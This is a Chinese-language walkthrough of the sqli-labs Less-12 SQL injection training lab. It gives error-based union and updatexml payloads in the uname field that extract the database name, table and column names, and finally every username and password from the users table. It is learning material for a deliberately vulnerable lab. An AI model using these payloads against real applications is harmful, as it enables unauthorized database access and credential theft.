原理及姿势参考:[网络安全]SQL注入原理及常见攻击方法简析
本文使用到了updatexml函数,原理及姿势可参考:[网络安全]sqli-labs Less-5 解题详析
判断注入类型
通过测试可知注入类型为双引号+括号注入
判断注入点个数
尝试可知注入点个数为2
查库名
uname=1") union select 1,updatexml(1,concat(0,(select database()),0),1)#
库名为security
查表名
uname=1") union select 1,updatexml(1,concat(0,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0),1)#
查users表的列名
uname=1") union select 1,updatexml(1,concat(0,(select group_concat(column_name) from information_schema.columns where table_name='users'),0),1)#
查字段
uname=1") union select 1,updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#
总结
以上为[网络安全]sqli-labs Less-12 解题详析,后续将分享[网络安全]sqli-labs Less-13 解题详析
文章来源:https://www.toymoban.com/news/detail-731228.html
我是秋说,我们下次见。文章来源地址https://www.toymoban.com/news/detail-731228.html
到了这里,关于网络安全]sqli-labs Less-12 解题详析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!